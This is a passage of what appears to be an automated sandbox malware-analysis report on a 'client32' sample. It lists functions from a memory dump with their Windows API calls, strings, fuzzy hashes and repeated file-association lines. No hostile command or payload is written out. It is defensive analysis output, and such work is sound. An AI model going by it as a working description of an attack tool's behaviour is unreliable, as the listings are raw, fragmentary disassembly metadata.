Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3726914545-2830328467
Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756

Function 1115F620 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1115F62F
_memset.LIBCMT ref: 1115F64B
GetMenuItemID.USER32(?,00000000), ref: 1115F65C

Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2

CheckMenuItem.USER32 ref: 1115F698
EnableMenuItem.USER32 ref: 1115F6AE
SetMenuItemInfoA.USER32 ref: 1115F6C4

Strings

0, xrefs: 1115F655

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
String ID: 0
API String ID: 176136580-4108050209
Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772

Function 110812A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1108132F
_memset.LIBCMT ref: 11081318

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\DataStream.cpp, xrefs: 110812B9, 110812D9, 110812F7, 11081346, 1108136E
IsA(), xrefs: 110812BE, 11081373
nBytes>=0, xrefs: 110812DE
pData, xrefs: 110812FC
m_iPos>=nBytes, xrefs: 1108134B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
API String ID: 75970324-4264523126
Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1

Function 1112BB80 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 1112BB88
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,SubnetMask,?,00000003), ref: 1112BB9B
_malloc.LIBCMT ref: 1112BBCC

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

_free.LIBCMT ref: 1112BBC4

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 1112BBEF

Strings

IPHLPAPI.DLL, xrefs: 1112BB81
GetAdaptersAddresses, xrefs: 1112BB95

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Heap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
String ID: GetAdaptersAddresses$IPHLPAPI.DLL
API String ID: 1157017740-1843585929
Opcode ID: ec03d54695a40ab4225806ab43fea2322c379f521fece9a83d1c943de74d1a29
Instruction ID: 025fa0f69e9a781e62cb4a2f2b475bec3de050e97fc9d900637a873596563486
Opcode Fuzzy Hash: ec03d54695a40ab4225806ab43fea2322c379f521fece9a83d1c943de74d1a29
Instruction Fuzzy Hash: 790184BA6403026BF2348B759D85F6BF7A8AB40B14F60482CF95A9B584DA72E441C768

Function 1103F450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 1103F466
FindWindowA.USER32 ref: 1103F47C
IsWindow.USER32(00000000), ref: 1103F484
Sleep.KERNEL32(00000014), ref: 1103F497
FindWindowA.USER32 ref: 1103F4A7
IsWindow.USER32(00000000), ref: 1103F4AF

Strings

PCIVideoSlave32, xrefs: 1103F477, 1103F49F

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Find$Sleep
String ID: PCIVideoSlave32
API String ID: 2137649973-2496367574
Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777

Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32 ref: 1100340E
GetSubMenu.USER32(00000000,00000000), ref: 1100343A
GetSubMenu.USER32(00000000,00000000), ref: 1100345C
DestroyMenu.USER32 ref: 1100346A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 1100341F, 11003447
hMenu, xrefs: 11003424
hSub, xrefs: 1100344C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9

Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32 ref: 1100331D
GetSubMenu.USER32(00000000,00000000), ref: 11003343
GetMenuItemCount.USER32(00000000), ref: 11003367
DestroyMenu.USER32 ref: 11003379

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 1100332E, 11003354
hMenu, xrefs: 11003333
hSub, xrefs: 11003359

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 4241058051-934300333
Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9

Function 110EFB70 Relevance: 12.1, APIs: 8, Instructions: 129fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000), ref: 110EFBB3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ddebb3266c5ba79a07f6b8d470fa1eddbd939e1a1b388148c9d70ce23a4d5093
Instruction ID: 7053a98a95f1787013b19c965889698e9493aed849bd5a4167a5a7c1904df78c
Opcode Fuzzy Hash: ddebb3266c5ba79a07f6b8d470fa1eddbd939e1a1b388148c9d70ce23a4d5093
Instruction Fuzzy Hash: 2241F772E012199FD724CFA8C985BAEF7F8EF84319F10456EE556DB680DB70A900C791

Function 11025712 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowTextA.USER32(?,?,00000050), ref: 11025766
_strncat.LIBCMT ref: 1102577B
SetWindowTextA.USER32(?,?), ref: 11025788

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

GetDlgItemTextA.USER32 ref: 11025814
GetDlgItemTextA.USER32 ref: 11025828
SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
SetFocus.USER32 ref: 11025855

Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
String ID:
API String ID: 3832070631-0
Opcode ID: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
Opcode Fuzzy Hash: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54

Function 110EF790 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000), ref: 110EF7BD
GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
GlobalLock.KERNEL32(00000000), ref: 110EF7EC
ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
GlobalUnlock.KERNEL32(00000000), ref: 110EF825
GlobalFree.KERNEL32(00000000), ref: 110EF82C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Global$File$ReadUnlock$AllocFreeLockSize
String ID:
API String ID: 3489003387-0
Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2

Function 11143820 Relevance: 12.1, APIs: 8, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1114382B
GetSubMenu.USER32(?,00000000,?,?), ref: 11143848
GetMenuItemID.USER32(?,00000000), ref: 11143869
GetMenuItemID.USER32(?,00000001), ref: 11143872
GetMenuItemID.USER32(?,-00000001), ref: 1114387C
DeleteMenu.USER32 ref: 11143892
GetMenuItemID.USER32(?,00000001), ref: 1114389A
DeleteMenu.USER32 ref: 111438B1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Item$Delete$Count
String ID:
API String ID: 1985338998-0
Opcode ID: c97f0512c627da812fff9da4634e6cbe95e36318860c0e1331f9727aaf39abe5
Instruction ID: 1fd4eba2895a352ce9ef292ca712417bb50dbed27225d5083b87c16346d81a74
Opcode Fuzzy Hash: c97f0512c627da812fff9da4634e6cbe95e36318860c0e1331f9727aaf39abe5
Instruction Fuzzy Hash: 7611817181422BBBF7059B60CDC8AAFF7BCEF45A19F204229F92592440E7749544CBA1

Function 11089950 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D

GetParent.USER32(00000000), ref: 11089996
GetParent.USER32(00000000), ref: 110899A7

Strings

.hlp, xrefs: 11089B0E, 11089B3E
.chm, xrefs: 11089AEF, 11089B5D
WinHelp cmd=%d, id=%d, file=%s, xrefs: 11089A83
debughlp.$$$, xrefs: 110899AF

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ParentWindow
